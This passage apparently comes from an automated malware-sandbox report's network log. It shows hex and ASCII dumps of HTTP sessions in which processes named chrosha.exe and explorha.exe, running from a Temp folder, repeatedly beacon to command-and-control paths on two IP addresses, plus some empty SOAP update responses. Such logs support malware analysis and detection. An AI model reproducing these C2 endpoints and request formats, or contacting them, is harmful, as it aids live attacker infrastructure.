                                                                                                                                                                                                                                      Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 2f 3e 3c 2f 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                                                                                                                                                                                                      Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetUpdatesResponse xmlns="http://tempuri.org/"><GetUpdatesResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"/></GetUpdatesResponse></s:Body></s:Envelope>
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:02.312182903 CEST408INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Content-Length: 261
                                                                                                                                                                                                                                      Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                                                                      Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:59 GMT
                                                                                                                                                                                                                                      Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 2f 3e 3c 2f 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                                                                                                                                                                                                      Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetUpdatesResponse xmlns="http://tempuri.org/"><GetUpdatesResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"/></GetUpdatesResponse></s:Body></s:Envelope>
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:04.713609934 CEST408INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Content-Length: 261
                                                                                                                                                                                                                                      Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                                                                      Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:59 GMT
                                                                                                                                                                                                                                      Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 2f 3e 3c 2f 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                                                                                                                                                                                                      Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetUpdatesResponse xmlns="http://tempuri.org/"><GetUpdatesResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"/></GetUpdatesResponse></s:Body></s:Envelope>
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:09.519361973 CEST408INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Content-Length: 261
                                                                                                                                                                                                                                      Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                                                                      Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:59 GMT
                                                                                                                                                                                                                                      Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 2f 3e 3c 2f 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                                                                                                                                                                                                      Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetUpdatesResponse xmlns="http://tempuri.org/"><GetUpdatesResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"/></GetUpdatesResponse></s:Body></s:Envelope>


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      254192.168.2.550093193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:08.399171114 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:08.652082920 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:08 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      255192.168.2.550096193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:08.557076931 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:08.814207077 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:08 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      256192.168.2.550097193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:09.003595114 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:09.242697001 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:09 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      257192.168.2.550098193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:09.179227114 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:09.423626900 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:09 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      258192.168.2.550099193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:09.454112053 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:09.708194017 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:09 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      259192.168.2.550100193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:09.496159077 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:09.750339031 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:09 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      260192.168.2.550101193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:10.070673943 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:10.316658020 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:10 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      261192.168.2.550102193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:10.119183064 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:10.363306046 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:10 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      262192.168.2.550104193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:10.614137888 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:10.866561890 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:10 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      263192.168.2.550105193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:10.699224949 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:10.946702957 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:10 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      264192.168.2.550106193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:11.193897963 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:11.440952063 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:11 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      265192.168.2.550107193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:11.227988005 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:11.473793030 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:11 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      266192.168.2.550108193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:11.725832939 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
